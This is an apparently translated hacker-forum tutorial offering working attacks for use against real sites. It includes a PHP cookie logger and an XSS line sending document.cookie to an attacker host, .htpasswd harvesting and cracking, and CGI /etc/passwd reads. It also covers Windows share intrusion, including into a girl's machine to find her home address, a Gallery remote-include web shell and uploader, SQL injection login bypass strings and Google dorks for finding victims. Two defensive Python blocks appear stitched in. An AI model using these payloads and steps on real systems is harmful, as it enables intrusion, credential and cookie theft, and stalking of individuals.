
The most basic knowledge for becoming a hacker

21.) Technique for stealing a victim's cookies:
_ First, open Notepad and paste the following code into it:
CODE
<?php
define ("LINE", "\r\n");
define ("HTML_LINE", "");
function getvars($arr, $title)
{
    $res = "";
    $len = count($arr);
    if ($len>0)
    {
        if (strlen($title)>0)
        {
            print("[--------$title--------]" . HTML_LINE);
            $res .= "[--------$title--------]" . LINE;
        }
        foreach ($arr as $key => $value)
        {
            print("[$key]" . HTML_LINE);
            print($arr[$key] . HTML_LINE);
            $res .= "[$key]" . LINE . $arr[$key] . LINE;
        }
    }
    return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . ".txt";
$mode = "r+";
if (!file_exists($file))
    $mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
or
CODE
<?php
if ($contents && $header){
mail("victim@yahoo.com" , "from mail script",$contents,$header) or
die('couldnt email it');
sleep(2);
?>
<script language=javascript>
</script>
<?php
} else {
echo "nope";
}
(Change victim@yahoo.com to your own mail address.)
Save this Notepad file as "<any name you like>.php" (remember that it must have the .php extension), then upload it to some host that supports PHP; in my example it is abc.php. (Those of you who have built websites before will probably find this very easy, right?) This code's job is to steal the victim's information (and sometimes the cookie as well) when they open data containing this code, and it automatically saves the information into a file named <victim's IP>.txt.
_ Another way to get cookies is used on forums that have this bug but have not fixed it yet: when posting, you just add the following code to your post:
CODE
document.write('<img src=http://host_php/abc.php?abc='+escape(document.cookie)+'>')
where host_php is the address you uploaded the cookie-stealing file to,
and abc.php is my example file.
_ Example: when applied in an img tag, we use the following:
CODE
[img]javascript: Document.write('<img src=http://host_php/docs.php?docs='+escape(document.cookie)+'>')[/img]
or:
CODE
[img]javascript: Document.write('&#x3cimg src=http://host_php/docs.php?docs='+escape(document.cookie)+'&#x3e')[/img]
_ You can find websites of this kind to practice the example on by going to google.com and looking for forums with this bug using the keyword "Powered by .. forum" with the following forums: Ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. If you are lucky you may find forums that have not fixed this bug yet to practice on; whoever finds one, please share it with everyone.
_ There are many other quite good cookie-stealing scripts; look for more yourselves.
22.) How to break through a website's password protection:
_ When you go looking for information on some website, there are places on the site where you are blocked and a box appears demanding a password. This is the private area hiding secret information meant for a few people or a certain group (the storage of hacking tricks at viethacker.net that the e-Chip newspaper mentioned, for example). When we click on that link, it (usually) calls .htpasswd and .htaccess, which sit in the same protected directory of the site. Why does the name '.htaccess' start with a dot? Files whose names begin with a dot '.' are treated by web servers as configuration files. These files are hidden when you view the directory protected by the .htaccess file. These two files control access to the protected link you want to get into. One holds the password and username; the other does the job of encoding that information for the first file. Only when you enter both correctly does the link open. Look at the following example:
CODE
Graham:#.DGm3dR
Webmaster:GAj.3g#$@f
You can read the usernames, but do you understand anything from the passwords? Of course not. Do you understand why you cannot read them? It is because of the intervention of the .htaccess file. Since the two are in the same directory they act on each other to protect one another, so we would be foolish to try to break in and crack that wretched password (at least while we have no password-cracking strategy in hand; I am also researching direct intrusion, and if I succeed I will post it for you). The point is this: what happens if .htpasswd lies outside the directory protected by .htaccess? Then we can grab it easily. Look at the following example link:
http://www.company.com/cgi-bin/protected/
to check whether the .htpasswd file is protected by .htaccess, enter the following URL:
http://www.company.com/cgi-bin/protected/.htpasswd
If you get the response 'File not found' or similar, this file is certainly not protected; find it with one of the following URLs:
http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd
If you still do not see it, keep trying other similar URLs (it may be sitting right in the root directory) until you find it.
Once you have found this file, use the program "John the Ripper" or "Crackerjack" to crack the passwords stored in it. You surely know what to do next: take a valid username and password, break in and see what they are "hiding" in there, but do not change their password or ruin them.
You can also apply this method to take the admin's password, and most of the members of that closed group are people "with rank and power".
23.) Understanding CGI:
_ CGI is short for Common Gateway Interface. Most websites use CGI programs (also called CGI scripts) to perform the necessary jobs 24 hours a day. CGI scripts are essentially programs that are written and uploaded to the website, and the main languages are Perl, C, C++ and VBScript, of which Perl is the most popular because it is easy to write programs in, takes little space and, above all, can run continuously 24 hours a day.
_ Usually CGI scripts are kept in the /cgi-bin/ directory of the website, as in the following example:
http://www.company.com/cgi-bin/login.cgi
with specific jobs such as:
+ Creating a visitor counter.
+ Allowing guests to do some things and not others on your website.
+ Managing members' usernames and passwords.
+ Providing a mail service.
+ Providing link pages and passing messages back and forth between members.
+ Providing detailed error messages, etc.
24.) The most basic way to hack a website through CGI scripts:
_ Bug 1: the nph-test-cgi bug
+ Type the name of the vulnerable website into your browser.
+ Type the following at the end: /cgi-bin/nph-test-cgi
+ In the URL you will now see something like this:
http://www.servername.com/cgi-bin/nph-test-cgi
+ If successful you will see the directories kept inside. To view a directory, type:
CODE
?<directory name>/
+ The password file is usually kept in the /etc directory, so type the following in the URL:
http://www.servername.com/cgi-bin/nph-test-cgi?/etc/
_ Bug 2: the php.cgi bug
+ Similarly to the above, you just type the following in the URL to get the password:
http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
The important thing is that these are old bugs, so finding websites to practice on is very hard; go to google.com and type the keyword:
/cgi-bin/php.cgi?/etc/passwd
or cgi-bin/nph-test-cgi?/etc
then search to see which pages have not fixed the bug yet to practice on.
25.) Technique for breaking into a computer that is online:
_ Breaking into a computer that is online is a technique that is both easy and hard. It can be called easy when you use the tool ENT 3, but you will hit a problem using it: the speed of the victim's machine drops noticeably, and machines that share nothing cannot be entered, so if they switch off you are stuck before you have managed to grab an account. There is a quieter way that slows things down less and can get in even when the victim shares nothing: using DOS programs to attack. Ok, let's begin:
_ Use an IP scanner such as ENT 3 to scan for the target IP.
_ Go to Start ==> Run and type cmd.
_ In the DOS window type the command "net view <victim's IP>"
+ Example: c:\net view 203.12.30.xx
_ Look at the result; if there are shares it is easy, you just type the next command
net use <any drive letter on your machine>: \\<victim's IP>\<victim's share>
+ Example: c:\net use E: \\203.12.30.xx\C
_ If connecting to the victim's machine demands a password, download a password-guessing program and use it (I suggest the program "pwak2" for guessing passwords on machines running Win9x or WinMe, and the program "xIntruder" for Win NT). Note that the two programs are used similarly: on the first line we enter the victim's IP, on the second the name of the victim's share, but with "xIntruder" take care to set its Delay sensibly; on a LAN its Delay is 100 and on the Internet it is in the thousands.
_ If the victim's machine has no shares, type the command:
net use <any drive letter on your machine>: \\<victim's IP>\c$ (or d$) "administrator"
+ Example: net use E: \\203.12.30.xx\C$ "administrator"
The c$ share is the default on all machines, and the USER is "administrator".
_ We can apply this method to break into the machine of a girl we are "secretly in love with" to look for data relating to her address (provided she is using a machine at home and you are lucky enough to find the address). You just chat with her on Y!Mass, then go to DOS and type:
c:\netstat -n
When using this method, close all other windows and keep only the Y!Mass chat window with her; it helps you determine her IP address more easily. Then use the intrusion method I described above. (Perhaps our lovesick friend tykhung, long ago when wooing his girlfriend over the network, also used this way to break in and find her address, hehe.)
You will succeed if the victim's machine has no firewall or proxy installed.
====================================================
Many of you have asked me to give exact addresses to practice on, but I cannot, because I have learned from experience with guides that gave exact addresses: after practicing and gaining admin rights, some of you deleted their database. HVA would then get the reputation of being the source of destruction on the net. I hope you understand; where possible I will only give the ways to find vulnerable addresses and not any specific address.
====================================================
Next I will cover the technique for preventing intrusion into your own computer while you are online, an overview of the steps we take when we decide to hack a website, the technique for finding vulnerable websites to practice on, the technique for hacking the web through the Gallery bug, etc.
26.) Understanding RPC (Remote Procedure Call):
_ Windows NT provides the ability to use RPC to run distributed applications. Microsoft RPC includes the libraries and services that allow distributed applications to operate in the Windows NT environment. Distributed applications consist mainly of many processes executing some defined task. These processes can run on one or several computers.
_ Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must be coupled with the Microsoft RPC name service interface (NSI). NSI includes API functions that give access to many entities in the same name service database (the name service database holds the entities, groups of entities, and the history of the entities on the server).
When Windows NT is installed, the Microsoft Locator is automatically chosen as the name service provider. It is the optimal name service provider in a Windows NT network environment.
27.) A simple technique to prevent unauthorized intrusion while online through RPC (Remote Procedure Call):
_ If you suspect that someone is breaking into your machine or that an admin is watching you via remote desktop, you just turn off the Remote Procedure Call feature; then, at present, no program can watch you via remote desktop. It also blocks most intrusion tools (since most tools are written to connect based on remote procedure call (over tcp/ip)). Most trojans also rely on this protocol.
How to turn it off: go to Services / Remote Procedure Call (right-click), set Startup type to Disabled or Manual, then Apply.
This is a very effective protection for a PC (if you add turning off file sharing it becomes very hard to get hacked), but on a LAN it will cause you no small amount of trouble and you will not be able to run programs that involve this component. Choose what suits the way you work. In my opinion, on a LAN, installing a firewall is certainly relatively safe.
(Based on the article by brother "i nh c khoai" khoaimi, admin of HVA)
28.) The steps of hacking a website today:
_ According to the book Hacking Exposed 3, hacking a website normally goes through the following steps:
+ FootPrinting: (tracing footprints)
This is what a hacker does to get the maximum amount of information about the host/business/user. It includes details of IP address, Whois, DNS, etc., mostly official information related to the target. Often the hacker simply uses the search tools on the net to find this information.
+ Scanning: (probing)
With the information in hand, the next step is evaluating and identifying the services the target has. This includes port scanning, operating system identification, etc. Tools used here include nmap, WS pingPro, siphon, fscan and many others.
+ Enumeration: (enumerating vulnerabilities)
The third step is looking for poorly protected resources, or user accounts that can be used to break in. This includes default passwords and default scripts and services. Many network administrators do not know about these values or have not changed them.
+ Gaining Access: (finding a way in)
Now the intruder tries to get into the network using the information gathered in the three steps above. The methods used here may be attacking a buffer overflow bug, grabbing and decrypting the password file, or, most crudely, brute-forcing (trying every possibility) the password. Tools commonly used at this step are NAT, podium, or L0pht.
+ Escalating Privileges: (escalating privileges)
For example, if the hacker has got into the network with a guest account, they will try to gain control of the whole system. The hacker will try to crack the admin's password, or use a privilege-escalation vulnerability. John and Riper are two very commonly used password-cracking programs.
+ Pilfering: (used when files containing passwords are handled carelessly)
Once more the search tools are used to look for ways to get into the network. Text files containing passwords, or other insecure mechanisms, can be prey for the hacker.
+ Covering Tracks: (erasing traces)
After getting the needed information, the hacker tries to erase their traces, deleting the operating system's log files so that the administrator does not notice the system was intruded, or, if they do, cannot find out who the intruder was.
+ Creating "Back Doors": (creating a back door so that the next intrusion is easier)
The hacker leaves "Back Doors", i.e. a mechanism that lets them come back in by a secret path without much effort, by installing a Trojan or creating a new user (in organizations with many users). The tools here are the various Trojans and keyloggers.
+ Denial of Service (DoS): (denial-of-service attack)
If the intrusion fails, DoS is the final means of attacking the system. If the system is not configured properly, it breaks and lets the hacker in. In other cases DoS makes the system stop working altogether. Tools commonly used for DoS are trin00, Ping Of Death, teardrop, and the various nukers and flooders. This method is very harmful and is still widely used today.
_ Depending on their knowledge and skill, a hacker skips some of these steps. It is not necessary to follow them in order. Remember the saying "know your enemy and know yourself, and you win a hundred battles out of a hundred".
(Material from HVA and hackervn.net)
29.) How to find vulnerable websites:
_ You surely know the websites that specialize in searching for information on the net? But you probably did not suspect that we can use those sites to find vulnerable websites (I usually use google.com and recommend you use it too, because it is very powerful and effective).
_ If you are interested in website bugs and want to find them, just go to google.com and type the bug string after "allinurl:". Example: we have the following vulnerable website string:
cgi-bin/php.cgi?/etc/passwd
you would type:
allinurl:cgi-bin/php.cgi?/etc/passwd
It will list the websites currently affected by this bug; look at the bottom of each listed item (the green address line); if a line reads exactly like the keyword you entered, that page has or had the bug. Whether you can actually get in depends on whether the site has fixed it yet.
_ If you are interested in forum bugs and want to find forums of this kind to practice on, just enter the keyword
powered by <forum name> <version number>
For example, to find forums running Snitz 2000:
powered by Snit 2000
_ However, finding the right vulnerable forum or website this way does not have a high hit rate; pay attention to the special string in the URL that is characteristic of each type of website or forum (this is very important, find out more about it yourselves). For example, for the Hosting Controller bug we have the characteristic string
"/admin or /advadmin or /hosting"
so we type the keyword:
allinurl:/advadmin
or allinurl:/admin
or allinurl:/hosting
It will list the websites whose URL has the form:
http://tentrangweb.com/advadmin
or http://tentrangweb.com/admin
or http://tentrangweb.com/hosting
For example, the UBB forum has the characteristic string
"cgi-bin/ultimatebb.cgi?"
and we search in the same way as above.
Once you know how to search like this, from now on you only need to follow the updates on the "HVA security bugs" board that LeonHart posts every day; you will understand what they mean and can check for yourselves.
30.) Technique for hacking the web through the Gallery bug (a form of PHP code injection):
_ Gallery is a tool for creating a photo gallery on the web, written in PHP; by exploiting this weakness we can add a piece of PHP code that lets us upload, which is our main goal.
_ First, register a free host; it is easiest to register at brinkster.com. Then open Notepad and create a PHP file with the following code:
CODE
<?php
global $PHP_SELF;
echo "<html><body>
<form method=post action=$PHP_SELF?$QUERY_STRING>
<input type=text name=shell size=0>
<input type=hidden name=act value=shell>
<input type=submit value=Go name=sm>
</form>";
set_magic_quotes_runtime(1);
if ($act == "shell") {
    echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
    system($shell);
    echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
}
echo "</body></html>";
?>
From this code create 2 files with different names (but the same code) and name them:
+ shellphp.php: this file is used to run a shell on the victim host.
+ init.php: this file is uploaded to the site on the host you just created. (Upload this init.php early, since we will need it, although with different code; the important thing is to get this file uploaded.)
Create one more PHP file with the following code:
CODE
<?php
function handleupload() {
    if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        $filename = $_FILES['userfile']['tmp_name'];
        print "$filename was uploaded successfully";
        $realname = $_FILES['userfile']['name'];
        print "realname is $realname\n";
        print "copying file to uploads dir ".$realname;
        copy($_FILES['userfile']['tmp_name'],PATH.$realname); // note: we will change PATH later
    } else {
        echo "Possible file upload attack: filename".$_FILES['userfile']['name'].".";
    }
}
if ($act == "upload") {
    handleupload();
}
echo "<html><body>
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING>
File:<INPUT TYPE=FILE NAME=userfile SIZE=3>
<input type=hidden name=MAX_FILE_SIZE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=Upload name=sm>
</form>
</body></html>";
?>
Name it upload.php; it will be used to upload to the victim's website.
_ Next go to Google, type "Powered by gallery" and press Enter; Google will list a heap of sites using Gallery. Pick any one and use the following link to test whether it is still vulnerable to the Gallery bug:
http://<victim's website name>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/<the host name you just registered>/
If you see a rectangular box appear at the very top with a "Go" button to its right, you have as good as found the target. Now you can type commands through that box to hack the victim's website.
First type the command "pwd" to determine the absolute path of the current directory and press "Go"; when the result appears, quickly note the path shown below (I will use the path I found, "/home/abc/xy/gallery", as the example).
Then type the command "ls -al" to list its subdirectories.
Now look at the result; you will see a heap of subdirectories listed. Always remember that our goal is to find a directory where we can upload the upload.php we prepared earlier, so work this out carefully by looking at the last characters of each result line:
+ Exclude the directories marked "." or "..", since these are the root or virtual directories (they are usually at the top of the result lines).
+ Also exclude lines whose last word has an extension (e.g. config.php, check.inc, etc.), since these are files, not directories.
+ What remains are directories you can upload to, but I advise choosing lines whose directory name has a count greater than 1 (you can tell from the 2nd column from the left), because that way you can be sure it is a directory and not a virtual one, and the site's admin will find it harder to notice when we put our file in. In my example I found the directory "loveyou" containing 12 files, to which we can upload, so the actual path we will upload to is:
/home/abc/xy/Gallery/loveyou
Now go to your host account and change the content of init.php to match the code of upload.php, but change PATH to "/home/abc/xy/gallery/loveyou/". At the same time prepare an upload.php on your own machine with PATH set to "" (two double quotes).
Now we can upload upload.php to the victim's website; enter the following address in your browser:
http://<victim's website name>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/<the host name you created at the start>/
You will see another rectangular box appear, with 2 buttons beside it, a "Browse" button and an "Upload" button. Use the "Browse" button to point to the upload.php you prepared on your machine; when you click "Upload" it uploads upload.php to the victim's website. Ok, now you have as good as completed the road to hacking the site. From here on, use it to attack further, e.g. take the database or passwords (done the same way as in the previous hacking guides), but you should only practice and not delete their database or destroy their site. If you are a true hacker you only need to upload a line saying "Hacked by .." and that's it.
As in previous lessons, whether you succeed depends on luck and on persistent research and application of your knowledge.
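The server-side counterpart, as an added example that is not part of the article or of the Gallery project: confining a caller-supplied base-directory value of the GALLERY_BASEDIR kind to a local tree before it is used to build an include path. The root path, function names and sample values are constructed.

```python
"""Added example, not from the original article or the Gallery project: confining
a caller-supplied base-directory parameter (the GALLERY_BASEDIR shape above) to a
local tree before it is used to build an include path.  Root path and sample
values are constructed."""
import posixpath
from urllib.parse import urlsplit

ALLOWED_ROOT = "/srv/www/gallery"   # constructed: the only tree includes may come from


def resolve_basedir(user_value: str, root: str = ALLOWED_ROOT) -> str:
    """Return the absolute directory under `root` named by `user_value`, or raise
    ValueError.  Refuses remote URLs (the http://attacker-host/ shape used
    against Gallery), stream wrappers such as php://, scheme-relative //host/
    values, NUL bytes and ../ traversal that would leave the root."""
    if "\x00" in user_value:
        raise ValueError("NUL byte in path")
    parts = urlsplit(user_value)
    if parts.scheme or parts.netloc:
        raise ValueError("URL rejected, only local paths allowed: %r" % user_value)
    candidate = posixpath.normpath(posixpath.join(root, user_value.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes root: %r" % user_value)
    return candidate


def include_path(user_value: str, filename: str) -> str:
    """Final include target: validated base directory plus a fixed file name."""
    return posixpath.join(resolve_basedir(user_value), filename)


def check_basedir(user_value: str) -> bool:
    """True when the value would be accepted, False when it would be rejected."""
    try:
        resolve_basedir(user_value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for v in ("skins/classic/", "http://wwwxx.brinkster.com/evil/",
              "../../etc/", "php://input"):
        print("%-5s %s" % (check_basedir(v), v))
```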
31.) What is a TCP/IP packet?
TCP/IP stands for Transmission Control Protocol and Internet Protocol; a TCP/IP packet is a block of data that is compressed, then has a header added, and is sent to another computer. This is how the Internet transmits information: by sending packets. The header of a packet contains the IP address of the sender. You can rewrite a packet and make it look as if it came from someone else!! You can use this to try to get into a great many systems without being caught. You will have to run on Linux or have a program that lets you do this.
32.) What is Linux:
_ In the original sense, Linux is the kernel of an OS. The kernel is the software responsible for the communication between application programs and the computer hardware. It provides functions such as file management, virtual memory management, and I/O devices like ports, the monitor, the keyboard, .... But the Linux kernel is not yet an OS, so it has to be combined with the application programs written by the GNU organization to make a complete OS: the Linux OS. This is also why we see GNU/Linux whenever Linux is mentioned.
Next, a company or organization packages these products (the kernel and the application programs), then adjusts some configuration with the characteristics of that company/organization and adds an Installation Process for the Linux bundle; that gives us a Distribution. Distributions differ in the number and kind of software packaged, in the installation process, and in the kernel version. Some large Linux distributions today are: Debian, Redhat, Mandrake, SlackWare, Suse.
33.) Basic commands to know when using or breaking into a Linux system:
_ The "man" command: when you want to know how to use some command, you can consult this command:
Syntax: $ man <command>
Example: $ man man
_ The "uname" command: gives basic information about the system
Example: $uname -a ; it prints something like:
Linux gamma 2..1 #3 Wed Dec 2 10:0:0 CT 2001 i unknown
_ The id command: view the current uid/gid (view the current user and group)
_ The w command: view the logged-in users and what they are doing on the system.
Example: $w prints something like:
10:31pm up 2 days, :0, 1 users, load average: 0.0, 0.01, 0.00
_ The ps command: view information on the processes on the system
Example: $ps axuw
_ The cd command: to move to some directory, you must use this command.
Example: $ cd /usr/bin ----> takes you to the bin directory
_ The mkdir command: create a directory.
Example: $ mkdir /home/convit ---> creates a directory convit in /home
_ The rmdir command: remove a directory
Example: $ rmdir /home/conga ----> removes the directory conga in /home.
_ The ls command: list the contents of a directory
Example: $ls -laR /
_ The printf command: print formatted data, like using printf() in C++.
Example: $printf %s "\x1\x1\x1\x1"
_ The pwd command: print the current directory
Example: $pwd ------> tells us where we currently are:
/home/level1
_ The commands cp, mv, rm mean: copy, move, delete a file
Example with rm (del): $rm -rf /var/tmp/blah -----> deletes the file blah.
Do likewise with cp and mv.
_ The find command: search for files and directories
Example: $find / -user level2
_ The grep command: a search tool; the simplest usage is: grep "something"
Example: $ps axuw | grep "level1"
_ The strings command: prints all the printable characters in a file. Use it to find string declarations in a program, or system calls; sometimes you even find a password.
Example: $strings /usr/bin/level1
_ The strace command: (linux) traces system calls and signals, extremely useful for following a program's flow and the fastest way to determine where a program fails. On other unix systems the equivalent tools are truss, ktrace.
Example: $strace /usr/bin/level1
_ The "cat, more" commands: print a file's contents to the screen
$cat /etc/passwd | more --> prints the passwd file as quickly as possible.
$more /etc/passwd ----> prints the passwd file slowly, a page at a time.
_ The hexdump command: prints the ascii, hex, octal and decimal values corresponding to the input data.
Example: $echo AAAA | hexdump
_ cc, gcc, make, gdb: compilation and debugging tools.
Example: $gcc -g -o bof bof.c
Example: $make bof
Example: $gdb level1
(gdb) break main
(gdb) run
_ The perl command: a language
Example: $perl -e 'print "A"x102' | ./bufferoverflow (buffer overflow when we enter 102 characters)
_ The "bash" command: it automates your tasks with shell scripts, extremely powerful and flexible.
To learn about bash, see what it is like:
$man bash
_ The ls command: view the contents of a directory (list the files in a directory).
Example: $ ls /home ----> shows all the files in the home directory
$ ls -a -----> shows all files, including hidden ones
$ ls -l -----> gives information about the files
_ Command to write output to a file:
Example: $ ls /usr/bin > ~/convoi ------> writes the listing of the bin directory into a file convoi.
34.) Basic knowledge about Linux:
a.) Some important directories on a server:
_ /home: where users' files are kept (e.g. a user who logs in with the name convit has a directory /home/convit)
_ /bin: where the essential basic Unix commands such as ls live.
_ /usr/bin: where other special commands live, commands used by special users and for system administration.
_ /boot: where the kernel and the other files used at boot time live.
_ /etc: network support files, NFS (Network File System), mail (this is the vital place we need to exploit the most)
_ /var: administrative files
_ /usr/lib: the standard libraries such as libc.a
_ /usr/src: the location of program sources.
b.) Location of the password file on various versions:
CODE
A 3 /etc/security/passwd !/tcb/auth/files//
A/ 3.0s /tcb/files/auth/?/
BSD.3-Ren /etc/master.passwd
ConvexOS 10 /etc/shadpw
ConvexOS 11 /etc/shadow
DG/ /etc/tcb/aa/user/
EP/ /etc/shadow x
HP- /.secure/etc/passwd
R /etc/shadow x
Linux 1.1 /etc/shadow
OS/1 /etc/passwd[.dir|.pag]
SCO nix #.2.x /tcb/auth/files//
SunOS.1+c2 /etc/security/passwd.adjunct ##username
SunOS .0 /etc/shadow
System V Release .0 /etc/shadow x
System V Release .2 /etc/security/ database
ltrix /etc/auth[.dir|.pag]
NCOS /etc/udb
35.) Exploiting a Linux bug through the security hole in the WU-FTP server:
_ WU-FTP Server (developed by the University of Washington) is FTP server software used quite widely on Unix & Linux systems (all distributors: Redhat, Caldera, Slackware, Suse, Mandrake....) and also on Windows....; hackers can run their own commands remotely through the file-globbing bug by overwriting a file on the system.
_ However, exploiting this bug is not easy, since it requires the following conditions:
+ You must have an account on the server.
+ You must get shellcode into the memory of the server process.
+ You must send a special FTP command containing a special globbing pattern such that the server does not detect the error.
+ The hacker overwrites a function with code pointing at the shellcode, so that it is executed by the FTP server itself.
_ Let us analyze the following example of overwriting the FTP server's file:
CODE
ftp> open localhost <== command to open the vulnerable site.
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2..1-1) ready <== we are in the FTP server.
Name (localhost:root): anonymous <== enter the name here
331 Guest login ok, send your complete e-mail address as password.
Password:..<== enter the password here
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== binary mode is used to transfer files.
ftp> ls ~{ <== command to list the current directory.
22 Entering Passive Mode (127,0,0,1,21,20)
21 Service not available, remote server has closed connection
10 ? S 0:00 ftpd: accepting connections on port 21
11 tty3 S 1:2 gdb /usr/sbin/wu.ftpd
22 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
22 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 22
Attaching to program: /usr/sbin/wu.ftpd, process 22 <== exploiting the wu.ftpd bug.
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i/libc.so.
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x01 in __libc_read () from /lib/i/libc.so.
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x1111) at malloc.c:313
313 in malloc.c
My own tests of exploiting this bug have not succeeded so far (no idea where I went wrong). So if any of you manages it, post it so everyone knows.
Linux bugs are very rare these days (especially for Redhat); keep watching, whenever a new bug appears the "Security bugs" board will update it immediately. For how to exploit them, ask the Mods managing the board, especially Leonhart; he is diligent about answering you.
(Based on the article by brother Binhnx2000)
36.) Understanding SQL Injection:
_ SQL Injection is one of the kinds of web hacking that is gradually becoming popular now. By injecting SQL query/command code into the input before it is passed to the web application for processing, you can log in without a username and password, run commands remotely, seize data and get root on the SQL server. The tool used for the attack is any web browser, such as Internet Explorer, Netscape, Lynx, ...
_ You can find vulnerable pages by using search tools to look for pages that allow submitting data. Some pages pass parameters through hidden areas, so you have to view the source to see them. For example, we determine that this page uses data submission thanks to the code we see when viewing the source:
CODE
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
_ Check whether the page has this bug by entering the following as login and password in turn:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
If that does not work, try the following logins and passwords:
CODE
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
If successful, you can log in without having to know the username and password.
This bug has to do with queries, so anyone who has studied databases can exploit it easily just by typing queries in the browser. If you want to understand this bug more thoroughly, find the articles by the vicky group.
37.) An example of hacking the web through the admentor bug (a form of SQL Injection):
_ First go to google.com and find admentor sites with the keyword "allinurl: admentor".
_ Usually you will get results like this:
http://www.someserver.com/admentor/admin/admin.asp
_ Try entering ' or ''=' as the login and password:
CODE
Login : ' or ''='
Password : ' or ''='
_ If successful you enter the vulnerable site in the role of admin.
_ Now let's look at how to fix this bug:
+ Filter special characters such as ' " ~ \ by inserting the following javascript:
CODE
function RemoveBad(strTemp)
{
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
    return strTemp;
}
+ And call it from inside the asp script:
CODE
var login = RemoveBad(Request.QueryString("login"));
var password = RemoveBad(Request.QueryString("password"));
_ And that fixes the bug.
_ You can apply this hack to other websites that have data submission; go and test it, Vietnamese sites have this a lot, I have gotten quite a few admin passwords by this method (but I also told them to fix it).
_ Many sites cannot be entered with ' or ''=' but only with real nicknames registered on the site; go to the "members" link to find an admin's nick and test with it.
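As an added example, not part of the article: the string-built login query that the admentor-style bug relies on, next to a parameterized version and a Python port of the RemoveBad() filter above, all run against the article's test payloads on a constructed in-memory SQLite table. The user name, password and function names are constructed.

```python
"""Added example, not from the original article: the concatenated login query
behind admentor-style bugs, a parameterized version, and a port of the
RemoveBad() filter, run against the article's payloads.  All data constructed."""
import sqlite3

# The test payloads listed in the article, each used as both login and password.
PAYLOADS = [
    "hi' or 1=1--",
    "' or 1=1--",
    '" or 1=1--',
    "or 1=1--",
    "' or 'a'='a",
    '" or "a"="a',
    "') or ('a'='a",
    "' or ''='",
]

BAD_CHARS = "<>\"'%;()&+-"   # the character set the article's RemoveBad() strips


def make_db() -> sqlite3.Connection:
    """Constructed single-row member table; the password contains a '-'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'c0rrect-horse')")
    return conn


def login_vulnerable(conn, login, password):
    """Query built by string formatting: a quote in the input closes the literal
    early and the rest of the payload becomes SQL.  Returns the user or None."""
    sql = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
           % (login, password))
    try:
        row = conn.execute(sql).fetchone()
    except (sqlite3.Error, sqlite3.Warning):
        return None            # unbalanced payloads only cause a syntax error
    return row[0] if row else None


def remove_bad(s: str) -> str:
    """Python port of the article's RemoveBad(): drop every character in BAD_CHARS."""
    return "".join(c for c in s if c not in BAD_CHARS)


def login_filtered(conn, login, password):
    """The article's fix: strip metacharacters, then run the same string-built query.
    It stops the payloads, but also mangles any legitimate password holding a '-'."""
    return login_vulnerable(conn, remove_bad(login), remove_bad(password))


def login_safe(conn, login, password):
    """Parameterized query: values travel separately from the SQL text, so quotes
    and '--' stay data.  No character needs to be stripped."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = conn.execute(sql, (login, password)).fetchone()
    return row[0] if row else None


def bypass_count(login_fn) -> int:
    """Number of payloads that log in without knowing any password."""
    conn = make_db()
    return sum(1 for p in PAYLOADS if login_fn(conn, p, p) is not None)


if __name__ == "__main__":
    for fn in (login_vulnerable, login_filtered, login_safe):
        print("%-17s bypasses: %d/%d  legit login: %s" % (
            fn.__name__, bypass_count(fn), len(PAYLOADS),
            fn(make_db(), "admin", "c0rrect-horse")))
```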
38.) What is a DoS attack? (Denial Of Services Attack)
_ A DoS attack (denial-of-service attack) is a very harmful kind of attack; with it you only need one computer connected to the Internet to attack the opponent's computers. The essence of a DoS attack is that the hacker hogs a large amount of the server's resources (bandwidth, memory, CPU, disk, ...) so that the server can no longer answer requests from other people's machines (the machines of normal users), and the server may quickly stop working, crash or reboot.
3 . ) Cc loai DoS attack hin ang c bit n v s dung :
a . ) Winnuke :
_ This kind of DoS attack only applies to computers running Windows 9x. The hacker sends packets carrying "Out of Band" data to port 139 of the target machine (port 139 is the NetBIOS port; it only accepts packets that have the Out of Band bit set). When the victim's computer receives such a packet, a blue error screen is shown to the victim, because Windows receives the packet but does not know how to react to the Out of Band data, and the system crashes.
